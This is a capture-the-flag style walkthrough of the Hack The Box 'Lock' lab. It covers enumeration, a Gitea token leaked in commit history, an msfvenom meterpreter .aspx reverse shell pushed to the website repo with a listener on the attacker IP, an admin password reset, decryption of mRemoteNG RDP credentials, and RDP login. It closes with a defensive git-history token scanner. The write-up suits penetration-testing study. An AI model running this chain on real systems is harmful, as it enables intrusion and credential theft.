[Penetration Testing] HTB Lab: Lock - Full Walkthrough
## Information gathering

Target IP: 10.129.234.64
Kali IP: 10.10.16.4

```
┌──(root㉿kali)-[~/桌面/HTB]
└─# nmap -A -T4 10.129.234.64
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-15 01:34 EST
Nmap scan report for 10.129.234.64
Host is up (0.30s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Lock - Index
| http-methods:
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds?
3000/tcp open  http          Golang net/http server
|_http-title: Gitea: Git with a cup of tea
| fingerprint-strings:
|   GenericLines, Help, RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=74301fab8c80b509; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=7YhSALV0ZBSIvHetLhey94Wp5Es6MTc3MTEzNzQyMDEwNTU1NjcwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sun, 15 Feb 2026 06:37:00 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-auto">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>Gitea: Git with a cup of tea</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2xvY2FsaG9zdDozMDAwLyIsImljb25zIjpbeyJzcmMiOiJodHRwOi8vbG9jYWxob3N0OjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjU
|   HTTPOptions:
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=c9a200de20c43a71; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=_WL4mnt6F0jUe2zby5-7FVfiMSY6MTc3MTEzNzQyMTM0NTI4NDgwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sun, 15 Feb 2026 06:37:01 GMT
|_    Content-Length: 0
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-02-15T06:38:16+00:00; +1m58s from scanner time.
| ssl-cert: Subject: commonName=Lock
| Not valid before: 2026-02-14T06:34:21
|_Not valid after:  2026-08-16T06:34:21
| rdp-ntlm-info:
|   Target_Name: LOCK
|   NetBIOS_Domain_Name: LOCK
|   NetBIOS_Computer_Name: LOCK
|   DNS_Domain_Name: Lock
|   DNS_Computer_Name: Lock
|   Product_Version: 10.0.20348
|_  System_Time: 2026-02-15T06:37:37+00:00
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2026-02-15T06:37:38
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_clock-skew: mean: 1m57s, deviation: 0s, median: 1m57s

TRACEROUTE (using port 3389/tcp)
HOP RTT       ADDRESS
1   349.42 ms 10.10.16.1
2   349.72 ms 10.129.234.64

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.87 seconds
```

Four open ports were found: 80, 445, 3000 and 3389.

Under "Explore" in the top-left corner of Gitea, a public repository holds the following Python code:

```python
import requests
import sys
import os


def format_domain(domain):
    # Prepend the HTTPS scheme if the caller passed a bare host name
    if not domain.startswith(("http://", "https://")):
        domain = "https://" + domain
    return domain


def get_repositories(token, domain):
    # Authenticate with a Gitea personal access token
    headers = {"Authorization": f"token {token}"}
    url = f"{domain}/api/v1/user/repos"
    response = requests.get(url, headers=headers)
    if response.status_code == 200:
        return response.json()
    else:
        raise Exception(f"Failed to retrieve repositories: {response.status_code}")


def main():
    if len(sys.argv) < 2:
        print("Usage: python script.py <gitea_domain>")
        sys.exit(1)

    gitea_domain = format_domain(sys.argv[1])
    personal_access_token = os.getenv("GITEA_ACCESS_TOKEN")
    if not personal_access_token:
        print("Error: GITEA_ACCESS_TOKEN environment variable not set.")
        sys.exit(1)

    try:
        repos = get_repositories(personal_access_token, gitea_domain)
        print("Repositories:")
        for repo in repos:
            print(f"- {repo['full_name']}")
    except Exception as e:
        print(f"Error: {e}")


if __name__ == "__main__":
    main()
```

This is a Python script that lists a user's repositories through the Gitea API, authenticating with a personal access token. Its core functions:

- Authentication: uses a Gitea personal access token
- API call: requests Gitea's `/api/v1/user/repos` endpoint
- Domain handling: automatically prepends the HTTPS scheme
- Repository display: prints the full name of every repository owned by the user

Looking at the commit history reveals PERSONAL_ACCESS_TOKEN:

```
PERSONAL_ACCESS_TOKEN = "43ce39bb0bd6bc489284f2905f033ca467a6362f"
```

We copy the script to Kali, set the environment variable, and see that there are two repositories: dev-scripts and website.

There are two ways to get at them:

1. git. We already know dev-scripts, so next we clone the website repository. We have no password, only a token, but git allows the token to be used in place of a password: pass the access token in the `git clone` URL.

```bash
git clone https://username:token@gitea-domain/owner/repository.git
git clone http://43ce39bb0bd6bc489284f2905f033ca467a6362f@10.129.234.64:3000/ellen.freeman/website
```

2. curl.

```bash
curl http://10.129.234.64:3000/api/v1/user/repos -H "Authorization: Bearer 43ce39bb0bd6bc489284f2905f033ca467a6362f" -s | jq .
```

```json
[
  {
    "id": 1,
    "owner": {
      "id": 2,
      "login": "ellen.freeman",
      "login_name": "",
      "full_name": "",
      "email": "ellen.freeman@lock.vl",
      "avatar_url": "http://localhost:3000/avatar/1aea7e43e6bb8891439a37854255ed74",
      "language": "",
      "is_admin": false,
      "last_login": "0001-01-01T00:00:00Z",
      "created": "2023-12-27T11:13:10-08:00",
      "restricted": false,
      "active": false,
      "prohibit_login": false,
      "location": "",
      "website": "",
      "description": "",
      "visibility": "public",
      "followers_count": 0,
      "following_count": 0,
      "starred_repos_count": 0,
      "username": "ellen.freeman"
    },
    "name": "dev-scripts",
    "full_name": "ellen.freeman/dev-scripts",
    "description": "",
    "empty": false,
    "private": false,
    "fork": false,
    "template": false,
    "parent": null,
    "mirror": false,
    "size": 29,
    "language": "Python",
    "languages_url": "http://localhost:3000/api/v1/repos/ellen.freeman/dev-scripts/languages",
    "html_url": "http://localhost:3000/ellen.freeman/dev-scripts",
    "url": "http://localhost:3000/api/v1/repos/ellen.freeman/dev-scripts",
    "link": "",
    "ssh_url": "ellen.freeman@localhost:ellen.freeman/dev-scripts.git",
    "clone_url": "http://localhost:3000/ellen.freeman/dev-scripts.git",
    "original_url": "",
    "website": "",
    "stars_count": 0,
    "forks_count": 0,
    "watchers_count": 1,
    "open_issues_count": 0,
    "open_pr_counter": 0,
    "release_counter": 0,
    "default_branch": "main",
    "archived": false,
    "created_at": "2023-12-27T11:17:47-08:00",
    "updated_at": "2023-12-27T11:36:42-08:00",
    "archived_at": "1969-12-31T16:00:00-08:00",
    "permissions": { "admin": true, "push": true, "pull": true },
    "has_issues": true,
    "internal_tracker": {
      "enable_time_tracker": true,
      "allow_only_contributors_to_track_time": true,
      "enable_issue_dependencies": true
    },
    "has_wiki": true,
    "has_pull_requests": true,
    "has_projects": true,
    "has_releases": true,
    "has_packages": true,
    "has_actions": false,
    "ignore_whitespace_conflicts": false,
    "allow_merge_commits": true,
    "allow_rebase": true,
    "allow_rebase_explicit": true,
    "allow_squash_merge": true,
    "allow_rebase_update": true,
    "default_delete_branch_after_merge": false,
    "default_merge_style": "merge",
    "default_allow_maintainer_edit": false,
    "avatar_url": "",
    "internal": false,
    "mirror_interval": "",
    "mirror_updated": "0001-01-01T00:00:00Z",
    "repo_transfer": null
  },
  {
    "id": 5,
    "owner": {
      "id": 2,
      "login": "ellen.freeman",
      "login_name": "",
      "full_name": "",
      "email": "ellen.freeman@lock.vl",
      "avatar_url": "http://localhost:3000/avatar/1aea7e43e6bb8891439a37854255ed74",
      "language": "",
      "is_admin": false,
      "last_login": "0001-01-01T00:00:00Z",
      "created": "2023-12-27T11:13:10-08:00",
      "restricted": false,
      "active": false,
      "prohibit_login": false,
      "location": "",
      "website": "",
      "description": "",
      "visibility": "public",
      "followers_count": 0,
      "following_count": 0,
      "starred_repos_count": 0,
      "username": "ellen.freeman"
    },
    "name": "website",
    "full_name": "ellen.freeman/website",
    "description": "",
    "empty": false,
    "private": true,
    "fork": false,
    "template": false,
    "parent": null,
    "mirror": false,
    "size": 7370,
    "language": "CSS",
    "languages_url": "http://localhost:3000/api/v1/repos/ellen.freeman/website/languages",
    "html_url": "http://localhost:3000/ellen.freeman/website",
    "url": "http://localhost:3000/api/v1/repos/ellen.freeman/website",
    "link": "",
    "ssh_url": "ellen.freeman@localhost:ellen.freeman/website.git",
    "clone_url": "http://localhost:3000/ellen.freeman/website.git",
    "original_url": "",
    "website": "",
    "stars_count": 0,
    "forks_count": 0,
    "watchers_count": 1,
    "open_issues_count": 0,
    "open_pr_counter": 0,
    "release_counter": 0,
    "default_branch": "main",
    "archived": false,
    "created_at": "2023-12-27T12:04:52-08:00",
    "updated_at": "2024-01-18T10:17:46-08:00",
    "archived_at": "1969-12-31T16:00:00-08:00",
    "permissions": { "admin": true, "push": true, "pull": true },
    "has_issues": true,
    "internal_tracker": {
      "enable_time_tracker": true,
      "allow_only_contributors_to_track_time": true,
      "enable_issue_dependencies": true
    },
    "has_wiki": true,
    "has_pull_requests": true,
    "has_projects": true,
    "has_releases": true,
    "has_packages": true,
    "has_actions": false,
    "ignore_whitespace_conflicts": false,
    "allow_merge_commits": true,
    "allow_rebase": true,
    "allow_rebase_explicit": true,
    "allow_squash_merge": true,
    "allow_rebase_update": true,
    "default_delete_branch_after_merge": false,
    "default_merge_style": "merge",
    "default_allow_maintainer_edit": false,
    "avatar_url": "",
    "internal": false,
    "mirror_interval": "",
    "mirror_updated": "0001-01-01T00:00:00Z",
    "repo_transfer": null
  }
]
```

| Field | dev-scripts repo | website repo | Pentest interpretation |
| --- | --- | --- | --- |
| Repository ID | 1 | 5 | Unique identifier; may be needed for API operations |
| Owner | ellen.freeman | ellen.freeman | Pins down the target user; later enumeration can centre on this account |
| Full name (`full_name`) | ellen.freeman/dev-scripts | ellen.freeman/website | Core identifier for cloning or accessing the repo, in "username/repo" form |
| Visibility (`private`) | false (public) | true (private) | website is a private repo and very likely holds sensitive content such as site source or deployment scripts; focus here |
| Main language | Python | CSS | Hints at the content: dev-scripts holds Python scripts, website holds front-end/web code |
| Size | 29 KB | 7370 KB (about 7.2 MB) | website is large and richer in content; it is the primary target |
| Permissions (`permissions`) | admin: true / push: true / pull: true | admin: true / push: true / pull: true | The token has admin rights on the repo and can push and modify code; this is the key to escalation |
| Clone URL (`clone_url`) | http://localhost:3000/ellen.freeman/dev-scripts.git | http://localhost:3000/ellen.freeman/website.git | Clone the repo locally through this URL to analyse its contents |

This indicates that any change to the repository automatically changes the hosted website. Looking at index.html inside this directory, we find the HTML of the site we visited earlier. That means we can commit code to the repository and it will be pushed to the site automatically.

We change the contents of changelog.txt and commit:

```bash
git add .
git commit -m "mane update"
git config --global user.name "ellen.freeman"
git config --global user.email "ellen.freeman"
git push
```

Refreshing the page now shows the change.

## Exploitation

Since we can modify files on the server, and the Nmap scan confirmed that Microsoft IIS is the web server, we can upload an .aspx web shell to achieve remote code execution. We generate the web shell with msfvenom:

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=4444 -f aspx > test.aspx
```

Then we start a listener with msfconsole to catch the reverse shell once the web shell is triggered:

```bash
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.16.4; set LPORT 4444; run"
git add test.aspx
git commit -m "reverse shell"
git push
```

Back on the website, browsing to test.aspx gives us a shell.

Under C:\Gitea\data there is a database file, gitea.db. We tried the SMB share on port 445 but had no permission. We use the gitea command to change the administrator password:

```
.\gitea admin user change-password -u administrator -p chenzi123
```

The change succeeds and we log in successfully, but there is nothing of interest there.

The mRemoteNG connection configuration (config.xml) contains the following fields:

| Field | Value | Pentest interpretation |
| --- | --- | --- |
| EncryptionEngine | AES | The password encryption algorithm is AES in GCM mode; the key prerequisite for decryption |
| BlockCipherMode | GCM | AES block cipher mode; the decryption tool must match it |
| KdfIterations | 1000 | Iteration count of the key derivation function; needed for decryption |
| Protected | sDkrKn0JrG4oAL4GW8BctmMNAJfcdu/ahPSQn3W5DPC3vPRiNwfo7OH11trVPbhwpy1FnqfcPQZ3olLRyDhDFpm | mRemoteNG's master encryption key (Base64); decrypting the password depends on this value |
| Name | RDP/Gale | Name of this connection profile; points to the user Gale |
| Username | Gale.Dekarios | A valid user account on the target; central to later login and escalation |
| Password | TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDXhUYwBePQ/2qKx57IeOROXhJxA7CczQzr1nRm89JulQDWPw | The user's encrypted password (Base64); must be decrypted to plaintext |
| Hostname | Lock | Target host of the connection, i.e. the box itself |
| Protocol | RDP | The connection protocol is RDP (Remote Desktop, port 3389) |
| Port | 3389 | Default RDP port; after decrypting the password, try a remote login |

Encrypted password: TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDXhUYwBePQ/2qKx57IeOROXhJxA7CczQzr1nRm89JulQDWPw

We can decrypt it with mremoteng-decrypt:

```bash
git clone https://github.com/kmahyyg/mremoteng-decrypt
python mremoteng_decrypt.py -rf config.xml
```

```
Username: Gale.Dekarios
Hostname: Lock
Password: ty8wnW9qCKDosXo6
```

The profile is an RDP connection, so we now hold valid RDP credentials. With them we can open an RDP session to the machine:

```bash
xfreerdp /v:10.129.234.64 /u:Gale.Dekarios /p:ty8wnW9qCKDosXo6
```

Success: the flag is on the desktop.

## Privilege escalation

Exploit the PDF24 vulnerability CVE-2023-49147 to obtain NT AUTHORITY\SYSTEM privileges.
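Added defensive note and example, not part of the original writeup: the whole chain above begins with a personal access token that was committed to dev-scripts and later swapped for `os.getenv`, yet it remains readable in git history. The script below, my own and not the box's or any project's code, scans `git log -p` output for credential-shaped values on added lines; the HEX40/KEYWORD heuristics, the sample history, its SHAs and its token are constructed placeholders.

```python
import re
import subprocess

# Heuristics (assumed, not from the writeup): a 40-hex value has the shape of
# the Gitea personal access token leaked here; a nearby keyword cuts noise.
HEX40 = re.compile(r"(?<![0-9a-fA-F])[0-9a-f]{40}(?![0-9a-fA-F])")
KEYWORD = re.compile(r"token|secret|passw|api[_-]?key", re.IGNORECASE)


def scan_patch(patch_text):
    """Return (commit, path, line) for added lines that carry a 40-hex value
    next to a credential keyword. 'commit' and 'index' lines of a patch also
    hold 40-hex SHAs, so only '+' lines are inspected."""
    findings, commit, path = [], None, None
    for line in patch_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+++ "):
            path = line[4:].removeprefix("b/")
        elif line.startswith("+") and not line.startswith("+++"):
            body = line[1:]
            if HEX40.search(body) and KEYWORD.search(body):
                findings.append((commit, path, body.strip()))
    return findings


def scan_repo(repo_dir):
    """Scan every commit on every branch of a local clone (requires git)."""
    log = subprocess.run(["git", "-C", repo_dir, "log", "-p", "--all"],
                         capture_output=True, text=True, check=True).stdout
    return scan_patch(log)


# Constructed two-commit history with placeholder SHAs and token: the second
# commit moves the token to an environment variable, but the first still leaks it.
SAMPLE_PATCH = """\
commit 0123456789abcdef0123456789abcdef01234567
diff --git a/repos.py b/repos.py
index 0000000000000000000000000000000000000000..1111111111111111111111111111111111111111
--- /dev/null
+++ b/repos.py
@@ -0,0 +1,2 @@
+import requests
+PERSONAL_ACCESS_TOKEN = "deadbeefdeadbeefdeadbeefdeadbeefdeadbeef"
commit 89abcdef0123456789abcdef0123456789abcdef
diff --git a/repos.py b/repos.py
index 1111111111111111111111111111111111111111..2222222222222222222222222222222222222222 100644
--- a/repos.py
+++ b/repos.py
@@ -1,2 +1,2 @@
 import requests
-PERSONAL_ACCESS_TOKEN = "deadbeefdeadbeefdeadbeefdeadbeefdeadbeef"
+PERSONAL_ACCESS_TOKEN = os.getenv("GITEA_ACCESS_TOKEN")
"""
```

Running `scan_repo` on a clone of dev-scripts would flag the commit that introduced the token; the remediation is to revoke the token in Gitea and rewrite or re-create the history, not merely to remove the line.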